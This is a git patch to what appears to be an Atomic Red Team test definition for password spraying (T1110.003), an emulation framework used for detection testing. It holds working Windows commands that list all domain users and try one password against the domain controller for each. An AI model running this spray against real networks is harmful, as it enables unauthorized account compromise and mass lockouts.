From a084ff4ae60a435e48cc8776b7587973a7ee595d Mon Sep 17 00:00:00 2001
From: clr2of8 <clr2of8@gmail.com>
Date: Thu, 25 Jun 2020 19:27:02 -0600
Subject: [PATCH] some cleanup

---
 atomics/T1110.003/T1110.003.yaml | 24 ++++++++++++++++++------
 1 file changed, 18 insertions(+), 6 deletions(-)

diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 6344e04c..621b858a 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -1,8 +1,15 @@
 attack_technique: T1110.003
 display_name: 'Brute Force: Password Spraying'
 atomic_tests:
-- name: Password Spray all domain users
-  description: This atomic will create a list of all domain users in the temp directory called users.txt. It will then attempt to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the list. It will print successful authentications to the screen.
+- name: Password Spray all Domain Users
+  description: 
+    CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
+
+    This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. 
+    Any successful authentications will be printed to the screen with a message like "[*] username:password". No output will be received if no successful
+    authentications occur. Use the input arguments to specify your own password to use for the password spray.
+
+    Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.
   supported_platforms:
   - windows
   input_arguments:
@@ -10,14 +17,19 @@ atomic_tests:
       description: The password to try for each user in users.txt
       type: string
       default: Spring2020
-  executor:
-    command: |-
+  dependencies:
+  - description: |
+      List of domain users to password spray must exits at %tempe%\users.txt
+    prereq_command: |
+      if not exist %temp%\users.txt (exit /b 1)
+    get_prereq_command: |
       rem Create the users.txt by parsing the "net users /domain" output
       del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
       @FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line:  =,%  >> %temp%\1.txt
       @FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
       @FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
       @FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
-      rem Execute the password spray, trying the password set above for every user in the domain
+  executor:
+    command: |-
       @FOR /F %n in (%temp%\users.txt) do @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL
-    name: powershell
\ No newline at end of file
+    name: command_prompt
\ No newline at end of file